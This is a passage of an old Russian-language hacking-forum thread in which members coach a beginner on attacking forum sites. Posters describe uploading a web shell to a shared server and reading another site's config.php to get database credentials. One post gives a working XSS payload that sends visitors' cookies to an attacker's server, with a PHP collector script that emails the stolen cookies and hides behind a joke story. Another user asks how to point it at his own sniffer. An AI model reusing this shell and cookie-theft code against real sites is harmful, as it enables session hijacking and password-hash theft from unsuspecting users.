ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 04.12.2005, 01:11
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

>>> форум читать буду очень долго
Долго, но полезно :-)

А насчёт ссылочки - ну не описывается это всё нигде в одной теме + от многих вещей зависит.

Это же всё-таки не инструкция к микроволновой печке.
__________________
Full DNS report

Последний раз редактировалось Azazel; 04.12.2005 в 01:13..
 
Ответить с цитированием

  #12  
Старый 04.12.2005, 01:30
Danya
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме:
75754

Репутация: 1
По умолчанию

ехххх... ну и на том спасибо... хотя для человека который всего неделю назад узнал что такое експлойт и что такое командная строка - слишком много иноформации ((((
 
Ответить с цитированием

  #13  
Старый 04.12.2005, 03:51
Danya
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме:
75754

Репутация: 1
По умолчанию

2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
 
Ответить с цитированием

  #14  
Старый 04.12.2005, 12:42
FHT
Постоянный
Регистрация: 21.09.2005
Сообщений: 525
Провел на форуме:
2994394

Репутация: 547


Отправить сообщение для FHT с помощью ICQ
По умолчанию

Цитата:
Сообщение от Danya  
2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
Правильно...Тока в админке можна и хеши посмотреть на юзерей...
 
Ответить с цитированием

  #15  
Старый 04.12.2005, 12:50
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Цитата:
Сообщение от Danya  
2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
Правильно, правильно: хэши и соль от паролей можно посмотреть. А так, толку от XSS на вторых версиях по моему мало.
__________________
Full DNS report
 
Ответить с цитированием

  #16  
Старый 06.12.2005, 18:46
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию

это называется атака через соседа,помню в каком то номере журнала хакер была такая тема =).
 
Ответить с цитированием

  #17  
Старый 08.12.2005, 03:21
Danya
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме:
75754

Репутация: 1
По умолчанию

через шелл не пробовала и не буду. чтобы получить доступ к базе, надо хотябы знать ее название, рута и пасс...короче инахх (((

Последний раз редактировалось Azazel; 08.12.2005 в 03:40..
 
Ответить с цитированием

  #18  
Старый 08.12.2005, 03:41
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Зря ты так. Заливаем шелл на тот же сервак. Выполняем комманду pwd
Получаем примерно /my/seycas/na/site/111/www/html/
Потом пишем cat /my/seycas/na/site/222/www/html/config.php и получаем то что ты хочешь знать.
Теоретически - это сработает. Практически, зависит от сервера.
__________________
Full DNS report
 
Ответить с цитированием

как делал я
  #19  
Старый 08.12.2005, 08:18
Alias
Новичок
Регистрация: 13.11.2005
Сообщений: 1
Провел на форуме:
5871

Репутация: 0
По умолчанию как делал я

Если форум поддерживает закачку html фаиликов к топикам то простой выход это - создаем топик(с максимально популярной темой) внутри которого находиться строчка типа: <script language=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>

затем заливаем на сервак который указали: фаилик test.php(c интересной историей например):
<?php
if(isset($QUERY_STRING));
{
$date=date('d.m.y:H:i:s');
mail("ваше@мыло.ru","New Coookie","Date and Time:$date\nIP:$REMOTE_ADDR\nAdress:$HTTP_REFERER\ nCookie:$QUERY_STRING");
}
header('Content-Type=text/html\n\n\n\n');
echo "<html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1251\"><title>story</title></head><body><pre>" .
"Есть у меня друг Костя, большой любитель представительниц женского пола.\n" .
"Если мы шли гулять и Костя не трахнул новую девушку - то вечер считался\n" .
"прожитым зря. И вот однажды на дискотеке Костя встретил ЕЁ. ОНА была\n" .
"достаточно симпатичной особой, к тому же, как и Костя, разведенной.\n" .
"Спустя месяц Костя сообщил мне, что собирается на НЕЙ жениться. Мало\n" .
"того, он сообщил, что \"завязал\", что уже давно не ходит по барам и\n" .
"вообще больше \"баб не цепляет\".\n" .
" \n" .
"Гоша Севастопольский" .
"</pre></body></html>";
?>

в результате на мыло приходят cookies с хешами паролей )) просто и сердито.

Естественно удача тут очень сильно влияет

Последний раз редактировалось Alias; 08.12.2005 в 08:33..
 
Ответить с цитированием

  #20  
Старый 09.12.2005, 08:44
Гаврила
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
Провел на форуме:
3175190

Репутация: 134
По умолчанию

Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/tyui.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href= "http://www.vash_server.ru/test.php?"+document.cookie</script>

Последний раз редактировалось Гаврила; 10.12.2005 в 08:07..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Форумы 19 18.11.2006 09:19
Взлом форумов IPB версии < 2.0.4 Ice_Fro$T Форумы 16 29.12.2005 12:22
Взлом IBP 2.0.4 через Xss Astro Форумы 3 29.11.2005 21:29
Проверка надежности Web-приложений. Часть Третья k00p3r Чужие Статьи 0 13.06.2005 11:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ